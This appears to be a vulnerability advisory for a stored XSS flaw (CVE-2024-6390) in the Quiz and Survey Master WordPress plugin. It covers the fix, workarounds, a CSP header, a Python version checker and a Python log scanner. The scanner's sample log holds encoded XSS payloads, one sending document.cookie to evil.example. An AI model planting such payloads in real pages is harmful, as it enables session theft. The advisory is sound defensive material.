CVE-2024-6390
📋 TL;DR
The Quiz and Survey Master WordPress plugin before version 9.1.0 has a stored cross-site scripting vulnerability in quiz settings. This allows authenticated users with contributor-level permissions or higher to inject malicious scripts that execute when other users view affected pages. WordPress sites using vulnerable plugin versions are affected.
💻 Affected Systems
- Quiz and Survey Master WordPress plugin
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal administrator session cookies, redirect users to malicious sites, or perform actions on behalf of authenticated users, potentially leading to full site compromise.
Likely Case
Malicious contributors could embed scripts to display unwanted content, deface pages, or steal lower-privileged user sessions.
If Mitigated
If Contributor-level accounts cannot reach the quiz settings and a CSP that does not permit inline script is enforced on the affected pages, the payload is either never stored or never executes, and impact is confined to the plugin's own pages.
🎯 Exploit Status
Exploitation requires an authenticated account with at least the Contributor role. The attacker saves a script payload in a quiz setting; it then runs in the browser of any user, including an administrator, who opens the affected page. Stored XSS via unescaped plugin settings is a well-understood WordPress pattern, so building a working payload takes little effort once an account is obtained.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 9.1.0
Vendor Advisory: https://wpscan.com/vulnerability/00586687-33c7-4d84-b606-0478b1063d24/
Restart Required: No
Instructions:
1. Log into the WordPress admin panel.
2. Navigate to Plugins → Installed Plugins.
3. Find 'Quiz and Survey Master'.
4. Click 'Update Now' if available.
5. Alternatively, download version 9.1.0 or later from WordPress.org and update manually.
🔧 Temporary Workarounds
Restrict User Roles
Limit Contributor and Author accounts' access to quiz settings, or restrict quiz editing to trusted Administrators, until the update is applied. Also review existing quiz settings for script content that a malicious contributor may already have saved; a workaround stops new injections but does not remove stored ones.
Content Security Policy
Enforce a CSP that does not allow inline script. A script-src containing 'unsafe-inline', as in many copied examples, gives no protection here: the injected payload is itself an inline script. Note that WordPress core and many plugins depend on inline scripts in wp-admin, so a strict policy will break admin pages unless you add nonces or hashes; roll it out as Content-Security-Policy-Report-Only first. Replace https://trusted.cdn.com with the hosts you actually load scripts from. The directive below is for Apache with mod_headers (use add_header in nginx).
Header set Content-Security-Policy "default-src 'self'; script-src 'self' https://trusted.cdn.com; object-src 'none'; base-uri 'self';"
🧯 If You Can't Patch
- Disable the Quiz and Survey Master plugin entirely until patching is possible.
- Implement web application firewall rules to block XSS payloads in quiz parameter inputs.
🔍 How to Verify
Check if Vulnerable:
Check WordPress admin → Plugins → Installed Plugins → Quiz and Survey Master version number.
Check Version:
wp plugin get quiz-master-next --field=version
The plugin's slug (its directory name under wp-content/plugins) is quiz-master-next; its display name 'Quiz and Survey Master' will not match in WP-CLI.
Verify Fix Applied:
Confirm plugin version is 9.1.0 or higher in WordPress admin plugins page.
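Version checks are easy to get wrong with plain string comparison (9.10.0 sorts below 9.9.0 lexically). The following is an added example, not code from the page or from the plugin: it reads the version the same way WordPress does, from the "Version:" line of the plugin's main file header, and compares it numerically against 9.1.0. The sample header is constructed; the directory name quiz-master-next is the plugin's WordPress.org slug, and the main PHP file name is not assumed, so every top-level .php file in that directory is tried.

```python
import glob
import re
from typing import Optional, Tuple

FIXED_VERSION = "9.1.0"  # first release with the fix, per the advisory

# WordPress reads a plugin's version from the "Version:" line of the header
# comment in its main PHP file (get_file_data reads the first 8 KiB).
_VERSION_RE = re.compile(r"^[\s*#]*Version:\s*(\S+)", re.IGNORECASE | re.MULTILINE)

# Constructed sample header in the shape WordPress plugin main files use.
SAMPLE_HEADER = """<?php
/**
 * Plugin Name: Quiz And Survey Master
 * Version: 9.0.2
 */
"""


def parse_plugin_version(header_text: str) -> Optional[str]:
    """Return the Version: value from a plugin header block, or None if absent."""
    m = _VERSION_RE.search(header_text)
    return m.group(1) if m else None


def version_key(version: str) -> Tuple[int, ...]:
    """Turn '9.10.2' into (9, 10, 2) so comparison is numeric, not lexical.
    Non-numeric suffixes (e.g. '-beta') are dropped; treat such builds as
    needing manual review rather than trusting this result."""
    parts = []
    for piece in version.split("."):
        digits = re.match(r"\d+", piece)
        parts.append(int(digits.group(0)) if digits else 0)
    return tuple(parts)


def is_vulnerable(installed: str, fixed: str = FIXED_VERSION) -> bool:
    """True when the installed version predates the fixed release."""
    a, b = version_key(installed), version_key(fixed)
    width = max(len(a), len(b))
    a += (0,) * (width - len(a))  # pad so '9' compares as 9.0.0
    b += (0,) * (width - len(b))
    return a < b


def check_installed(plugins_dir: str = "wp-content/plugins"):
    """Read the real header off disk. Returns (version, vulnerable) or (None, None)
    when the plugin directory or its header cannot be found."""
    for path in sorted(glob.glob(f"{plugins_dir}/quiz-master-next/*.php")):
        with open(path, encoding="utf-8", errors="replace") as fh:
            version = parse_plugin_version(fh.read(8192))
        if version:
            return version, is_vulnerable(version)
    return None, None


if __name__ == "__main__":
    installed, vulnerable = check_installed()
    if installed is None:
        print("quiz-master-next not found under wp-content/plugins")
    else:
        state = f"VULNERABLE, update to {FIXED_VERSION}" if vulnerable else "fixed"
        print(f"installed {installed}: {state}")
```

Run it from the WordPress document root; it exits quietly with a "not found" message when the plugin is absent, which itself answers the question.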
📡 Detection & Monitoring
Log Indicators:
- Unusual POST requests to /wp-admin/admin-ajax.php with quiz-related parameters containing script tags
- Repeated requests from one client carrying percent-encoded script markup (%3Cscript, javascript%3A, on...%3D) in quiz or survey parameters; access logs do not label XSS attempts, so this has to be derived from request content
Network Indicators:
- HTTP requests with encoded script payloads in quiz or survey parameter values
- Victims' browsers issuing requests from quiz pages to domains you do not load scripts from (cookie or token exfiltration); a CSP deployed in report-only mode surfaces these as violation reports
SIEM Query (pseudo-syntax; map the field names to your log schema):
source="web_logs" AND (uri_path="/wp-admin/admin-ajax.php" OR uri_path="/wp-admin/admin.php") AND (param="quiz" OR param="survey") AND (content="<script" OR content="javascript:")
Standard web server access logs record only the request line, not the POST body, so the request that stores the payload is usually invisible to this query; it shows up only in a WAF or ModSecurity audit log or an application-level audit plugin. The query above mainly catches payloads passed in the query string.
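The query above in runnable form, as an added example that is not part of the original page: it parses Apache combined-format lines, decodes quiz and survey parameters (twice, to catch double-encoded payloads), flags script markup and inline event handlers, and counts hits per client. The log lines, IP addresses and parameter names are constructed for illustration and do not reflect the plugin's real request format. The POST on the first line has no query string and is deliberately not flagged: its body is where a stored payload would travel, and access logs do not record it.

```python
import re
from collections import Counter
from typing import Dict, List
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in Apache "combined" log format. Addresses are from
# documentation ranges and the parameter names are illustrative only.
SAMPLE_LOG = r'''
203.0.113.7 - - [10/Jul/2024:12:01:02 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 51 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jul/2024:12:01:05 +0000] "GET /wp-admin/admin.php?page=qsm_quiz_options&quiz_id=3&quiz_name=%3Cscript%3Efetch(%27//evil.example/%27%2Bdocument.cookie)%3C/script%3E HTTP/1.1" 200 8821 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Jul/2024:12:02:11 +0000] "GET /wp-admin/admin.php?page=qsm_quiz_options&quiz_id=3 HTTP/1.1" 200 8790 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jul/2024:12:03:40 +0000] "GET /wp-admin/admin.php?page=qsm_quiz_options&survey_title=x%22%20onerror%3Dalert(1) HTTP/1.1" 200 8830 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jul/2024:12:04:02 +0000] "GET /wp-admin/admin-ajax.php?action=save&quiz_desc=%253Cscript%253Ealert(1)%253C%252Fscript%253E HTTP/1.1" 200 40 "-" "Mozilla/5.0"
'''

# client, ident, user, [timestamp], "METHOD target protocol", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Script tags, javascript: URLs, inline event handlers and the usual
# tag-based vectors, matched case-insensitively on the decoded value.
XSS_RE = re.compile(
    r"<\s*script|javascript\s*:|\bon[a-z]+\s*=|<\s*(?:svg|img|iframe)\b",
    re.IGNORECASE,
)

WATCHED_PATHS = ("/wp-admin/admin-ajax.php", "/wp-admin/admin.php")


def is_quiz_param(name: str) -> bool:
    """The page's filter: parameter names mentioning quiz or survey."""
    n = name.lower()
    return "quiz" in n or "survey" in n


def scan_log(text: str) -> List[Dict[str, str]]:
    """Return one finding per suspicious quiz/survey parameter in the log text."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if url.path not in WATCHED_PATHS:
            continue
        # parse_qsl strips one layer of percent-encoding (and turns + into
        # space). unquote, not unquote_plus, strips a second layer so that
        # %253Cscript%253E is caught without mangling a literal + in the value.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            decoded = unquote(value)
            if is_quiz_param(name) and XSS_RE.search(decoded):
                findings.append({
                    "ip": m["ip"], "ts": m["ts"], "method": m["method"],
                    "param": name, "value": decoded,
                })
    return findings


def suspicious_sources(text: str, threshold: int = 2) -> Dict[str, int]:
    """Clients with at least `threshold` flagged requests, for alerting."""
    counts = Counter(f["ip"] for f in scan_log(text))
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE_LOG
    for f in scan_log(text):
        print(f"{f['ts']} {f['ip']} {f['method']} {f['param']}={f['value']!r}")
    print("repeat offenders:", suspicious_sources(text))
```

Point it at a real access log with `python3 scan.py /var/log/apache2/access.log`; the parameter-name filter and the path list are the knobs to widen if the plugin's actual admin endpoints differ from the two the page names.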